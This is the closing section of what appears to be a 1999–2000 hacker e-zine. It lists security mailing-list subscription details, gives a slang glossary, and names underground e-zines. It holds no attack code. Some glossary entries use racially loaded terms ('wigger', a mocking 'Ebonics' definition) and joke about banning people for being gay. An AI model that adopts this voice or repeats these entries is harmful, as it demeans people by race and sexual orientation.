    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

 ISSN 1004-042X

 Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
 News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
 Archivist: Brendan Kehoe
 Poof Reader: Etaion Shrdlu, Jr.
 Shadow-Archivists: Dan Carosone / Paul Southworth
 Ralph Sims / Jyrki Kuoppala
 Ian Dickinson
 Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List <ISN@SECURITYFOCUS.COM>
      From:         mea culpa <jericho@DIMENSIONAL.COM>
      Subject:      Where has ISN been?
      Comments: To: InfoSec News <isn@securityfocus.com>
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occured, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
      The subject line will always contain the title of the article, so that
      you may quickly and effeciently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributers.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 
          
          
     Win2k Security Advice Mailing List (new added Nov 30th 1999)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
      To subscribe:
      
      
      send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
      to  listserv@listserv.ntsecurity.net
      
     
      
      Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
      questions or comments about the list please feel free to contact the list
      moderator, Steve Manzuik, at steve@win2ksecadvice.net.
      
      To see what you've missed recently on the list, or to research an item
      of interest, be sure to visit the Web-based archives located at:
      http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
      
      ==============
      NTSecurity.net brings the security community a brand new (Oct 99) and
      much-requested Windows security mailing list. This new moderated mailing list,
      Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
      discussion of Windows-related security issues.
      
      With a firm and unwavering commitment towards timely full disclosure, this
      new resource promises to become a great forum for open discussion
      regarding security-related bugs, vulnerabilities, potential exploits, virus,
      worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
      and we openly invite all security minded individuals, be they white hat,
      gray hat, or black hat, to join the new mailing list.
      
      While Win2KSecAdvice was named in the spirit of Microsoft's impending product
      line name change, and meant to reflect the list's security focus both now and
      in the long run, it is by no means limited to security topics centered around
      Windows 2000. Any security issues that pertain to Windows-based networking are
      relevant for discussion, including all Windows operating systems, MS Office,
      MS BackOffice, and all related third party applications and hardware.
      
      The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
      a security risk, it's relevant to the list.
      
      The list archives are available on the Web at http://www.ntsecurity.net,
      which include a List Charter and FAQ, as well as Web-based searchable list
      archives for your research endeavors.
      
      SAVE THIS INFO FOR YOUR REFERENCE:
      
      To post to the list simply send your email to
      win2ksecadvice@listserv.ntsecurity.net
      
      To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
      listserv@listserv.ntsecurity.net
      
      Regards,
      
      Steve Manzuik, List Moderator
      Win2K Security Advice
      steve@win2ksecadvice.net     

    @HWA
    

A.9  Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pidgeon holed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. Its almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
                    _   ___        ___      _____ _    ___
                   | | | \ \      / / \    |  ___/ \  / _ \
                   | |_| |\ \ /\ / / _ \   | |_ / _ \| | | |
                   |  _  | \ V  V / ___ \ _|  _/ ___ \ |_| |
                   |_| |_|  \_/\_/_/   \_(_)_|/_/   \_\__\_\
                     

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal useage and use in this zine are
    listed below: Some are very useful, others attempt to deny the any possible
    attempts at eschewing obfuscation by obsucuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, 
            Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.like when you're kb'd from our chans for being gay its TFS,

   *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
            
A.11  NEW Underground E-Zines
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      New releases:
      
      SET Saqueadores Edicin Tcnica: http://www.set-ezine.org
      f41th magazine issue 12 is out.: http://f41th.com/index2.html
      Digital Defiance 5 (!) is out..: http://www.hackers.cx
      
      
      New zines on the scene:       

      InET.......................... http://www.warpedreality.com/inet
      Hack In the Box............... http://www.thelimit.net/hitb      
      Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt      
      DataZine...................... http://www.tdcore.com
      Napalm........................ http://napalm.firest0rm.org/
      Digital Defiance.............. http://www.hackers.cx  
      b0g .......................... http://www.b0g.org
      
      
            
   @HWA              
     
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

     1998, 1999, 1900 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  								  2000 (k)

